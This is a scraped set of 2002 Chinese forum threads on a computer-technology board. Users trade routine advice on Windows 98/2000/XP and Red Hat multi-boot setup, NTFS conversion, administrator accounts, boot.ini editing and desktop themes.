DayinNightout 超级用户 积分：345 发帖：152 来自：CCF 注册：2000-12-18 | 发表于 2002-02-18 19:56:47 按此观看DayinNightout的个人资料 按此发邮件给DayinNightout 发送悄悄话给DayinNightout 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DayinNightout的IP device=ide.sys /d:mscd007 (config.sys) mscdex /d:mscd007(autoexec.bat) 木有签名#@$%
上一贴 | 下一贴
快速回复 主题：如何在CONFIG.SYS和AUTOEXEC.BAT~~
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


我有问题请教！ - 经 典 论 坛

计算机技术
我有问题请教！

上一贴 | 下一贴
发表人 | 主题: 我有问题请教！
5156a 初级用户 积分：32 发帖：11 来自：中国辽宁沈阳 注册：2002-01-28 | 发表于 2002-02-18 16:18:02 按此观看5156a的个人资料 按此发邮件给5156a 5156a 的 oicq 是49790283,查看 49790283 的资料 收藏该主题供以后查看 发送悄悄话给5156a 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看5156a的IP 我从网易上面下载了一个桌面主题，但是我不知道应该安装到什么目录下才能看到效果，请各位指教！
sunjune 初级用户 积分：113 发帖：29 来自： 注册：2002-02-01 | 发表于 2002-02-18 18:30:59 按此观看sunjune的个人资料 按此发邮件给sunjune sunjune 的 oicq 是1871284,查看 1871284 的资料 发送悄悄话给sunjune 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sunjune的IP 试试这个吧，专门换桌面的 http://download.51soft.com/html/t/themechanger+.htm 还有这个 http://download.pchome.net/php/dl.php?sid=3469
imacwei 终级用户 积分：2344 发帖：1077 来自：China.Jiangs 注册：2001-07-23 | 发表于 2002-02-18 19:42:15 按此观看imacwei的个人资料 按此发邮件给imacwei 访问imacwei的主页 imacwei 的 oicq 是36110975,查看 36110975 的资料 发送悄悄话给imacwei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看imacwei的IP Windows98的话，你安装里面的桌面主体支持，然后直接双击那个themes就可以了！ 如果是2000，那就不支持了，如果是XP,那最好安装一个Style xp软件，非常好用！ 如果直接Copy 到Windows\Resources\Themes里面，好像效果不理想！ Loading………… WINDOWS2000-SP2+IE5.5 FIREWORKS,the solution for professional Web graphic design and production. Press Anykey To Continue… iMacWei
上一贴 | 下一贴
快速回复 主题：我有问题请教！
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


请教如何更改管理者权限？？ - 经 典 论 坛

计算机技术
请教如何更改管理者权限？？

上一贴 | 下一贴
发表人 主题: 请教如何更改管理者权限？？
jojo

终级用户
积分：609
发帖：189
来自：山东
注册：2000-12-07
 发表于 2002-02-17 14:42:25 按此观看jojo的个人资料 按此发邮件给jojo jojo 的 oicq 是1569453,查看 1569453 的资料 收藏该主题供以后查看 发送悄悄话给jojo 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jojo的IP
我的机器是win2000，不能安装和卸载任何软件，提示我没有管理者的权限，请问如何解决阿？先谢过啦。

：：：做自己喜欢的事情！：：：
stchin

书剑恩仇
现任版主
积分：3568
发帖：1271
来自：
注册：2001-03-07
 发表于 2002-02-17 14:45:01 按此观看stchin的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给stchin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看stchin的IP
你安装的时候没有注意

你用administrator作为用户名看看，密码估计你知道吧，就是装的时候你输入的那个。

到处都是正确答案

Blueidea Web Team
Moderator Of Code forum

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-17 22:01:09 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
和XP很类似呀！
2000内核的权限问题很多的！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-17 22:09:40 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
我的电脑->右键单击->管理->本地用户和组->用户组
看看管理员组应该为"Administrators"这个绝对不能改

::古落根门::

唯有不断学习 才能不断进步

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-17 22:45:23 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
改了会怎么样！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

啸

无意
现任版主
积分：6225
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-02-17 22:54:41 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
以管理员的身份登陆就行了。

to ImHow:
Administrators能改吗，好象不能吧。

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-17 23:02:11 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
可以改，是改组的名字
改过之后，管理员的权限就不再有了

::古落根门::

唯有不断学习 才能不断进步

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-17 23:06:20 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
哦？
也就是说，改了以后就没有管理员了？？
那不是什么也干不了吗？
如果连改回去都……………………（恐怖！）

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-17 23:49:06 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
不是，你改过之后，你再用原来的管理员账号登陆，还是可以改管理员组的名字的

::古落根门::

唯有不断学习 才能不断进步

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-18 10:20:24 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
那也就是说，
其实改的只是一个显示的文件了！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

jojo

终级用户
积分：609
发帖：189
来自：山东
注册：2000-12-07
 发表于 2002-02-18 17:05:03 按此观看jojo的个人资料 按此发邮件给jojo jojo 的 oicq 是1569453,查看 1569453 的资料 发送悄悄话给jojo 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jojo的IP
呵呵，我知道了，在控制面板--用户和密码 中添加一个用户设为Administrators权限就行了

：：：做自己喜欢的事情！：：：
上一贴 | 下一贴
快速回复 主题：请教如何更改管理者权限？？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


将FAT32分区转成NTFS的问题 - 经 典 论 坛

计算机技术
将FAT32分区转成NTFS的问题

上一贴 | 下一贴
发表人 | 主题: 将FAT32分区转成NTFS的问题
lincy 初级用户 积分：27 发帖：22 来自：Xiamen 注册：2000-09-10 | 发表于 2002-02-14 20:12:52 按此观看lincy的个人资料 按此发邮件给lincy lincy 的 oicq 是1808352,查看 1808352 的资料 收藏该主题供以后查看 发送悄悄话给lincy 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lincy的IP 用PM7.0将一个FAT32分区转成NTFS会不会破坏数据？ 其他分区能不能还保留FAT32？ 有没有别的软件可以将FAT32分区转成NTFS？ 谢！ --<Lincy>--菜鸟一只。
ImHow 怎样 积分：2446 发帖：648 来自：::HowHome:: 注册：2002-01-16 | 发表于 2002-02-14 20:33:52 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP 1.不会 2.能 3.如果是2000或XP，则在命令提示符下输入：convert "盘符“ /FS:ntfs ::古落根门:: 唯有不断学习 才能不断进步
onlysnake 终级用户 积分：2127 发帖：739 来自：经典_流氓屯 注册：2002-01-10 | 发表于 2002-02-14 21:24:06 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP PQ的功能是相当强大的！ 几乎可以完成所有的磁盘转换工作！ 我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！ Blueidea Counter Strike Team =Blueidea=onlysnake
ImHow 怎样 积分：2446 发帖：648 来自：::HowHome:: 注册：2002-01-16 | 发表于 2002-02-15 00:50:45 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP 不过遇上linux有点问题 ::古落根门:: 唯有不断学习 才能不断进步
onlysnake 终级用户 积分：2127 发帖：739 来自：经典_流氓屯 注册：2002-01-10 | 发表于 2002-02-15 18:05:13 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP 哦？ 有什么问题呀？ 不认分区格式？？ 我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！ Blueidea Counter Strike Team =Blueidea=onlysnake
ImHow 怎样 积分：2446 发帖：648 来自：::HowHome:: 注册：2002-01-16 | 发表于 2002-02-15 22:33:11 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP 装了linux后无法启动PQ(有时) 至今没有找到解决方法 ::古落根门:: 唯有不断学习 才能不断进步
chikin 初级用户 积分：71 发帖：19 来自：GuangZhou 注册：2001-12-27 | 发表于 2002-02-16 02:03:01 按此观看chikin的个人资料 按此发邮件给chikin 访问chikin的主页 chikin 的 oicq 是3636091,查看 3636091 的资料 发送悄悄话给chikin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看chikin的IP 但我觉得在NTFS下的XP用PQ好象也有问题呀，我用了几次都失败。 JavaScript Stack ----> 『网页天使』
ImHow 怎样 积分：2446 发帖：648 来自：::HowHome:: 注册：2002-01-16 | 发表于 2002-02-16 12:18:46 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP 这种不破坏数据进行硬盘分区本身就有危险性啊，出错是正常的，不要指望有多好拉 ::古落根门:: 唯有不断学习 才能不断进步
onlysnake 终级用户 积分：2127 发帖：739 来自：经典_流氓屯 注册：2002-01-10 | 发表于 2002-02-16 16:13:34 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP 是呀，还是FDISK好用呀！ （某些时候！） 我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！ Blueidea Counter Strike Team =Blueidea=onlysnake
ImHow 怎样 积分：2446 发帖：648 来自：::HowHome:: 注册：2002-01-16 | 发表于 2002-02-16 21:16:31 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP http://www.blueidea.com/bbs/NewsDetail.asp?id=376500 ::古落根门:: 唯有不断学习 才能不断进步
xqlyg 超级用户 积分：362 发帖：92 来自：china 注册：2002-02-07 | 发表于 2002-02-16 22:26:02 按此观看xqlyg的个人资料 按此发邮件给xqlyg xqlyg 的 oicq 是41770172,查看 41770172 的资料 发送悄悄话给xqlyg 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看xqlyg的IP 用PQ在XP底下转换没有事 我试过的
seaice 超级用户 积分：450 发帖：119 来自： 注册：2002-02-09 | 发表于 2002-02-17 00:02:45 按此观看seaice的个人资料 按此发邮件给seaice seaice 的 oicq 是6439755,查看 6439755 的资料 发送悄悄话给seaice 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看seaice的IP PQ要用正式版的 测试版是会出问题的 在用PQ的时候一定要先观察你的硬盘的情况·一般的连续的盘的操作的成功的机会会很大的 我用了很久的PQ 基本没有出任何的问题·
上一贴 | 下一贴
快速回复 主题：将FAT32分区转成NTFS的问题
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


请问WINDOWS和LINUX的安装顺序，急。 - 经 典 论 坛

计算机技术
请问WINDOWS和LINUX的安装顺序，急。

上一贴 | 下一贴
发表人 主题: 请问WINDOWS和LINUX的安装顺序，急。
chikin

初级用户
积分：71
发帖：19
来自：GuangZhou
注册：2001-12-27
 发表于 2002-02-15 10:39:00 按此观看chikin的个人资料 按此发邮件给chikin 访问chikin的主页 chikin 的 oicq 是3636091,查看 3636091 的资料 收藏该主题供以后查看 发送悄悄话给chikin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看chikin的IP
大家好。
因为我想装LINUX，现在已经装了98和2K，还准备装XP，那我想问问要装LINUX是哪个时候装好呢？
还有现在买的 RED HAT 最新是英文还是中文的呢？
那装好时开机的系统选择是如何的呢？
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-15 12:35:33 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
最后装，而且最好装在最后一个分区，不然在98下会盘符错乱。
有了2000，还要装XP？
RED HAT好像还只有国内的汉化版本.
装完linux后开机时有个LILO文件负责引导，还可以通过软盘引导linux，其他情况下正常启动linux

::古落根门::

唯有不断学习 才能不断进步

ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-15 12:39:48 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
这里有一些帖子，看看吧
http://www.linuxforum.net/forum/showthreaded.php?Cat=&Board=newbie&Number=164796&page=0&view=collapsed&sb=5&o=31&part=

::古落根门::

唯有不断学习 才能不断进步

风梦扬

超级用户
积分：331
发帖：125
来自：广州
注册：2000-10-21
 发表于 2002-02-16 00:36:33 按此观看风梦扬的个人资料 按此发邮件给风梦扬 访问风梦扬的主页 风梦扬 的 oicq 是110681,查看 110681 的资料 发送悄悄话给风梦扬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看风梦扬的IP
的确是好帖子.;)

华语互联直播立体台 -- Yuner.com(.cn) 全球华人目标生活多维媒质.

想和NJ们互动么?也欢迎各位一起来参与我们的节目!

进入 "QQ聊天室 -- 网络社团 -- 华语互联网络直播" 一起来互联你我吧.

啸

无意
现任版主
积分：6225
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-02-17 22:06:46 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
chikin在上个帖子中说
引用:

还有现在买的 RED HAT 最新是英文还是中文的呢？

据我知道的好象还是英文的。

http://www.blueidea.com/bbs/NewsDetail.asp?id=360580

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

masijia

高级用户
积分：221
发帖：60
来自：西安
注册：2002-02-08
 发表于 2002-02-20 15:45:11 按此观看masijia的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给masijia 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看masijia的IP
如要使WIN98,WIN2000,WINXP,RED HAT共存,那么利用MSTBOOT(系统引导管理工具)可以方便的安装多系统.
安装流程是:
1.新建主分区-留出2GB给RED HAT,剩下的全部化为扩展分区.

2.将扩展分区化为D,E,F三个逻辑分区.

3.在主分区装98,D区装2000,E区装XP,F区装日常软件.

4.安装RED HAT即可.

audreys

终级用户
积分：733
发帖：195
来自：js.lyg
注册：2000-11-07
 发表于 2002-02-20 16:03:24 按此观看audreys的个人资料 按此发邮件给audreys 访问audreys的主页 audreys 的 oicq 是57659189,查看 57659189 的资料 发送悄悄话给audreys 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看audreys的IP
我装了win98;win2k;winxp;redhat7.0linux都很好，我的安装顺序98------>2K-------->xp------->linux

痛并傻笑着！
piety

终级用户
积分：737
发帖：210
来自：www.piccool.
注册：2001-09-03
 发表于 2002-02-20 21:42:08 按此观看piety的个人资料 按此发邮件给piety 访问piety的主页 piety 的 oicq 是21512363,查看 21512363 的资料 发送悄悄话给piety 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看piety的IP
98必须最先装，然后基于NT基础的，最后LINUX

人生五十载，去事恍如梦幻。 天下之内，岂有长生不灭者！
上一贴 | 下一贴
快速回复 主题：请问WINDOWS和LINUX的安装顺序，急。
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


在WINME下装完XP，如何把WINME卸掉？ - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
在WINME下装完XP，如何把WINME卸掉？

上一贴 | 下一贴
发表人 主题: 在WINME下装完XP，如何把WINME卸掉？
北极猫

高级用户
积分：166
发帖：44
来自：
注册：2001-12-24
 发表于 2002-02-18 18:22:19 按此观看北极猫的个人资料 按此发邮件给北极猫 收藏该主题供以后查看 发送悄悄话给北极猫 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看北极猫的IP
在WINME下装完XP，如何把WINME卸掉？
WINME在C盘，XP在D盘，WINME卸掉后是不是要改成从D盘启动

都来帮帮俺呀

imacwei

终级用户
积分：2344
发帖：1077
来自：China.Jiangs
注册：2001-07-23
 发表于 2002-02-18 19:43:32 按此观看imacwei的个人资料 按此发邮件给imacwei 访问imacwei的主页 imacwei 的 oicq 是36110975,查看 36110975 的资料 发送悄悄话给imacwei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看imacwei的IP
不可能！没办法！

Loading…………
WINDOWS2000-SP2+IE5.5
FIREWORKS,the solution for professional Web graphic design and production.
Press Anykey To Continue…

iMacWei
DayinNightout

超级用户
积分：345
发帖：152
来自：CCF
注册：2000-12-18
 发表于 2002-02-18 19:58:53 按此观看DayinNightout的个人资料 按此发邮件给DayinNightout 发送悄悄话给DayinNightout 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DayinNightout的IP
format c: 后

在 c: 根目录下建立一个 boot.ini 的文件,内容如下
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(2)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="Microsoft Windows XP Professional" /fastdetect

木有签名#@$%
chikin

初级用户
积分：71
发帖：19
来自：GuangZhou
注册：2001-12-27
 发表于 2002-02-18 21:12:17 按此观看chikin的个人资料 按此发邮件给chikin 访问chikin的主页 chikin 的 oicq 是3636091,查看 3636091 的资料 发送悄悄话给chikin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看chikin的IP
楼上的是否实践过呢？
就一个boot.ini应该不可以吧。
IO 和 MSDOS 还有其他的一些文件不需要吗？

JavaScript Stack ----> 『网页天使』
onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-02-18 21:22:29 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
为什么不从WINME上升级安装呢？？

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

话草

终级用户
积分：688
发帖：223
来自：
注册：2001-08-07
 发表于 2002-02-19 09:58:58 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
即是屏蔽 多重引导 ，你用资源管理器找D 盘根目录的 boot.ini ，去掉只读，隐藏属性，用记事本打开，找【boot loader】 将timeout值改为0， 新建default 值 ， 设为default=multi(0)disk(0)partition(1)\WINNT ,重起 ......

这样你就不要me了 ， 删 ， 用楼上的楼上的话 ， FORMAT C:

DayinNightout

超级用户
积分：345
发帖：152
来自：CCF
注册：2000-12-18
 发表于 2002-02-19 10:07:50 按此观看DayinNightout的个人资料 按此发邮件给DayinNightout 发送悄悄话给DayinNightout 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DayinNightout的IP
chikin在上个帖子中说
引用:
楼上的是否实践过呢？
就一个boot.ini应该不可以吧。
IO 和 MSDOS 还有其他的一些文件不需要吗？

呵呵,,,,,,,,,,,,,用了 VM 后不装多 OS 噜

但应该是不会出错, winxp 是更改了 MBR 你 format 后不会有影响的

木有签名#@$%
imacwei

终级用户
积分：2344
发帖：1077
来自：China.Jiangs
注册：2001-07-23
 发表于 2002-02-19 10:55:15 按此观看imacwei的个人资料 按此发邮件给imacwei 访问imacwei的主页 imacwei 的 oicq 是36110975,查看 36110975 的资料 发送悄悄话给imacwei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看imacwei的IP

To [image] nlysnake
Winme上面直接升级XP不可能！只能够全新安装的吧。
------------------------------------------------------------------
照他的意思，要删除ME,留下XP的话，她的ME又不是在D:,而是在C:哦！
Format肯定没用的！

Loading…………
WINDOWS2000-SP2+IE5.5
FIREWORKS,the solution for professional Web graphic design and production.
Press Anykey To Continue…

iMacWei
BIGBUG

终级用户
积分：1278
发帖：803
来自：不一定
注册：2001-03-21
 发表于 2002-02-19 11:39:19 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
从一开始就应该想好该怎么装
最简单最有效最稳妥的办法：把C、D都格式化后，从DOS开始直接装叉屁到C

等我想想再签
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-02-19 12:42:20 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
2000需要在系统盘最少6个文件才可以正常启动
XP只需要boot.ini???

[这消息被ImHow编辑过(编辑时间2002-02-19 13:08:02)]

::古落根门::

唯有不断学习 才能不断进步

Fly

Developer
积分：4146
发帖：1028
来自：
注册：2001-10-31
 发表于 2002-02-19 12:55:11 按此观看Fly的个人资料 按此发邮件给Fly Fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给Fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fly的IP
如果手头有XP的安装盘,可以用安装盘进入恢复控制台,会先问你登录到哪个XP系统,一般来说,选1,键入系统管理员密码,你就进入了控制台的WINDOWS目录下,键入bootcfg /add,控制台会扫描WINDOWS,几秒后扫描完成,提示选择要添加的安装,选1,接着提示输入加载识别符,可输入"WINDOW XP",提示输入OS加载项,键入fastdetect,回车,键入exit,重启电脑,看看启动菜单回来没

我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西.
----尼采

ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
